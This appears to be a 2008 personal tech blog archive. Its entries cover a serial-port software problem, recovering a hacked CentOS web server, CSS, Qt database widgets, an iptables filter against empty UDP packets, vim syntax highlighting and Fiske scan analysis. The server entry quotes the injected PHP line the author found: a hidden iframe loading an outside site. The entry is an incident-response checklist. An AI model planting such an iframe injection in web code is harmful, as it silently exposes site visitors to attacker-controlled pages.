They have a custom I/O card, let's call it Raba1. This card has two serial
ports. The software reviews the incoming data from port TTY2, thinks about it and
then sends the appropriate commands on the TTY1 port. Problem is, sometimes
the software just halts for a minute. It does nothing while actually data was
coming in.

One thing that can go wrong here, has its root in the structure of the
software. It basically runs in a big loop, at the start of which is a select()
statement which monitors the two serial ports and the internal command channel
for input.

A theory is that it's missing data because the loop isn't fast enough. It
could happen that we send commands to the software through the internal
command channel and while these are parsed and handled, other data comes in
through port TTY2.

What makes this unlikely, is that such buffer overflows can be detected by the
Linux serial device driver. These were watched and were not found to correlate
with the pauses.

2008-05-06 Recovering from a hacked server

A friend of mine had a problem with a server in which a particular PHP script kept changing, including an iframe when it shouldn't.

I took the following steps to see what was happening. This can be used as a checklist.

  • Checked /etc/passwd for strange accounts
  • Did a 'ps -ef' to see what processes were running
  • Checked /var/log/secure for strange logins through SSH
  • Checked for other services running, for example FTP. Checked the logins on that as well.
  • Checked /tmp to see whether any executables were present
  • Checked Apache's default access logs
  • Checked Apache's access logs for each virtual host, paying attention to POST requests
  • Checked world-writeable and tmp directories in user home directories
  • Checked what's in the crontabs
  • Checked the OS version. In this case, found it by doing
  # cat /etc/redhat-release
  CentOS release 4.6

I found nothing weird in Apache's log files, no funny scripts et cetera.

In a bunch of PHP scripts, the following code was appended at the end:

 echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1"
 alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';

Googling for this turned out it's a pretty common attack. Articles suggest it might be a compomised FTP account. Checking the changed files, the date of the files suggests it's done in one fell swoop.

To see what FTP servers are running:

  # ps -ef

In case I missed anything, see what ports are listened to:

  # netstat --listen --ip -T -p

The -T option won't cut off long addresses and the -p option will print the process that's doing the listening.

Found out in /var/log/messages that a script logged in around the same time that the files were modified.

The conclusion was that a full OS reinstall was done, with a thorough tightening-up and a code review.

2008-05-06 CSS box model

Lately I've been lurking on the #CSS channel on the Freenode IRC server and I've noticed a lot of questions that basically boil down to a developer not understanding the CSS box model.

The most basic things to remember are, in my opinion, the following.

There are block and inline elements. In simple terms, block elements get a newline after them. Elements like div and p are block elements. Inline elements usually reside in a block element; think of them as stuff you'd put in a paragraph. Anchors and markup like em are all inline elements.

Then there is floating. If you let elements float left or right, they'll "float" to the top of the containing element. Floating elements must have width applied to them. Multiple elements will float nicely besides eachother if there's room.

When you've got a problem, think about the above two things and see if you can figure out what's happening. Don't just ask in the #css channel "what's happening", try to come up with a theory and state it. It'll help you a great deal more.

Also read Mike Hall's primer on CSS Positioning.

2008-04-16 Qt database widgets part 2

Last time I got away with creating a custom QItemDelegate but not this time. I need a radiobutton for a database column of which all rows must contain 0 (zero), except one row which must be set to 1 (one). This database column designates the default or current setting.

Presenting the user with a 1 or 0 isn't terribly friendly. Since a QItemDelegate is about both presenting and editing, this is an obvious candidate to be subclassed.

A nice example is the Spin Box Delegate, however, this example creates an editor but not a custom paint method for the normal viewing of the item.

2008-04-16 Qt database widgets

I've been playing with a couple of Qt classes to get an easy-to-use SQL user interface. The combo QTableView and QSqlTableModel seemed very nice. Using the Designer, I could click an interface together and voilĂ , a nice grid where the user can edit the database.

There were a couple of hicks. If fields were NULL in the database, these could be filled in but never put back to NULL. After reading and trying out lots of stuff, I found the following classes are involved:

QTableView Provides the general table widget on the screen
QItemDelegate Provides view/edit functions for specific cell types in the table widget on the screen
QSqlTableModel This class provides an easy-to-use API for a database table
QAbstractProxyModel A class that can be stuck over QSqlTableModel to transform, sort or filter data when it comes in or goes out of the QSqlTableModel

You have to think about what functions exactly you want to change. If it's the overall interface, think about the QTableView. In my case, I wanted to enable the user to set fields to NULL. The normal QItemDelegate doesn't allow this.

In the end I avoided the whole issue by using one type field (which can contain 'string', 'integer', 'double' et cetera.

2008-04-15 Opera schade

Always fun, browser wars. Especially in the office.

opera schade.png

For those not in-the-know: the markup is typical for the warnings on packages of cigarettes in the Netherlands. Translation: "Opera causes severe harm to you and others around you".

Stuck on an Opera promotional poster in the office.

2008-03-31 Filtering on packet size

I was asked recently to check how UDP packets could be filtered which don't
have any contents. The reason was that these packets were used as a Denial of
Service against a specific game server. This bug had been acknowledged by the
developers of the server, but had been fixed in a later version and wouldn't
be fixed in the older one.

iptables can filter on this as follows:

  $ sudo iptables -A INPUT -p udp --dport 6500 -m length --length 28 -j REJECT

Why the length is 28, I can't really say. It's of course UDP over IPv4. UDP
has a fixed header size, but IPv4 has a variable header size. Anyway, I've
tested the above using netcat:

Start service listening to port 6500 on machine 1:

  $ nc -l -u -p 6500

Open a new terminal on machine 1 and start a traffic dump:

  $ sudo tcpdump -X -vv "port 6500"

Set up a client on machine 2, which sends all input from stdin to machine 1:

  $ nc -u machine1 6500

Now type some text, then press enter. The server will output whatever you
typed. Now just press enter. You're sending a UDP packet with as a content the
enter \n. tcpdump should display:

 16:20:43.898341 IP (tos 0x0, ttl  64, id 65431, offset 0, flags [DF],
 proto: UDP (17), length: 29) machine1.6500 > machine2.36237: [bad udp
 cksum 26d!] UDP, length 1
        0x0000:  4500 001d ff97 4000 4011 ca51 ac10 8cb7  E.....@.@..Q....
        0x0010:  ac10 8c0e 1964 8d8d 0009 7101 0a         .....d....q..

Lengte 29 thus means: subtract one and get an empty UDP packet.

If that length doesn't work, you can play with ranges. For example "--length
20:30" means: reject everything between 20 and 30 bytes length.

2008-02-07 the WTF count

As inspired by the comic WTFs per minute, we'd thought that besides statements like TODO and FIXME, we would 'really' like vi to highlight the string WTF.

First, you need to locate the syntax file:

 $ locate syntax/c.vim
 /usr/share/vim/vim70/syntax/c.vim

If you're root, just edit this file, search for the line:

 syn keyword       cTodo       contained TODO FIXME XXX

and add WTF at the end of the line.

If you're a mere mortal user, copy this file to your .vimrc directory in your homedir and give it a name such as my_c.vim. Then edit the file as described above and add the following lines to your $HOME/.vimrc file:

 au BufRead,BufNewFile *.c set filetype=myc
 au! Syntax myc source $HOME/myc.vim

2008-01-30 Fiske scan analysis

I've written an analysis routine to see how the results of a particular Fiske "scan" hold up. Such a scan means: set a particular FFO current and an FFO countrol line current, then stepwise increment that last one while measuring the FFO voltage. A scan results, meaning a bunch of voltages. In such a scan, certain areas would never contain values -- search this blog for Fiske steps for more information.

I wanted to visually check the analysis of the routine. A scan can have a lot of outcomes. Say we want to find value 0.863. We'd then do a scan where we're aiming for a resulting voltage between 0.858 and 0.868. Some possible situations that could come out:

 1)    ---*-*-*-*-*-*-*-*-*--   Very nice step found
 2)    -*-*---------*-*-*-*-*   Found two steps, at the right is biggest
 3)    -*-*-*-*-*--------*-*-   Found two steps, at the left is biggest
 4)    **-*---------------*-*   Found two steps but they're both too small
 5)    ----------------------   No (or not enough) points found at all
 6)    --*-*-*-*-*-----------   One step found, but it's not nicely balanced

I've retrieved some test values and the scan results (without the FFO plot behind it) look as follows. The X axis displays the FFO voltage in mV. Note that the Y axis is a simple counter in this case, and is meaningless. It's also in reverse: the lower the value on the Y axis, the more recent the results on the X axis. The black line is the value that we're aiming at.

fiske scan 1.png

The first couple of lines (starting at the top) show the results of the setup phase of the Fiske macro. These can be ignored; they're not used for analysis.

Let's zoom in on the first lines (i.e. where the Y axis shows '42').

fiske scan 1 zoomed.png

We're looking for a line that's nicely centered around value 0.863 mV.

We can say the following things about the first bunch of lines below the setup lines:

  • They all contain enough points, enough so we can analyze them
  • They're all right in the middle between two "rows of points"
    Since we need a row where we have a bunch of points that's centered around our value of 0.863, so from 42 to 28, these rows are all useless.

Now what does the analysis routine say?

 Line 46 gives result: Last scan contained only 7 points
 Line 45 gives result: Last scan contained only 4 points
 Line 44 gives result: Last scan contained only 4 points
 Line 43 gives result: Last scan contained only 4 points
 Line 42 gives result: Last scan contained only 4 points
 Line 41 gives result: Last result had a skewed result set
 Line 40 gives result: Last result had a skewed result set
 Line 39 gives result: Last result had a skewed result set
 Line 38 gives result: Last result had a skewed result set
 Line 37 gives result: Last result had a skewed result set
 Line 36 gives result: Last result had a skewed result set
 Line 35 gives result: Last result had a skewed result set
 Line 34 gives result: Good result found
 Line 33 gives result: Good result found
 Line 32 gives result: Last scan contained only 6 points
 Line 31 gives result: Last scan contained only 4 points
 Line 30 gives result: Last scan contained only 6 points
 Line 29 gives result: Last result had a skewed result set
 Line 28 gives result: Last result had a skewed result set

Obviously the procedure thinks that lines 34 and 33 have a pretty good result, which is not the case.

After writing an analysis routine, the following output is shown:

 Line 37 gives result: Last result had a skewed result set
 Line 36 gives result: Last result had a skewed result set
 Line 35 gives result: Last result had a skewed result set
 Line 34 gives result: Last result had a skewed result set
 Line 33 gives result: Last result had a skewed result set
 Line 32 gives result: Last scan contained only 6 points
 Line 31 gives result: Last scan contained only 4 points
 Line 30 gives result: Last scan contained only 6 points
 Line 29 gives result: Last result had a skewed result set
 Line 28 gives result: Last result had a skewed result set
 Line 27 gives result: Last result had a skewed result set
 Line 26 gives result: Last result had a skewed result set
 Line 25 gives result: Last result had a skewed result set
 Line 24 gives result: Last result had a skewed result set
 Line 23 gives result: Good result found
 Line 22 gives result: Good result found
 Line 21 gives result: Last result had a skewed result set
 Line 20 gives result: Last result had a skewed result set
 Line 19 gives result: Last result had a skewed result set
 Line 18 gives result: Last result had a skewed result set

Still not OK. What's wrong here is that first the subroutine for a skewed result set is run. Then after that's successful, the detection needs to be added to see whether a set covers the target X value.

2008-01-02 Fiske results

Finally some visual results from the Fiske step routine.

fiske results1.png

This image shows the FFO as it's always drawn: bias current on the Y axis and resulting measured voltage on the X axis. The color displayed is the voltage on the SIS junction.

The blue lines are the scans as executed by the Fiske macro. As a reminder, such a macro is a list of commands for the FPGA on the electronics boards. The Fiske macro keeps the FFO bias on a single value, while the FFO control line is stepped up. As can be seen, the control isn't very regulated; the blue lines shift a little at the left and right edge. Well, actually it shifts more than a 'little'. The left is completely off :-)

To fix this, the starting point (the most left point) of each scan should be in line with the previous scan. The first point that's just over Vstart (see previous entries) is probably very nice.

What's happening now is that the procedure tries to find a good point in the scan part of the macro -- when actually a good point could reside in the find up part of the macro. So this problem is fixed by searching in that first find up part as well.

Note that currently, an analysis is run on each line. Normally, the scan would be stopped since the analysis was positive. This is the case when the blue line sees that it's right inside a cloud of points, where reading out the PLL IF voltage reports 0.4 V and higher). However, my Russian colleague gave the advice to let it run somewhat and see whether the analysis can be better.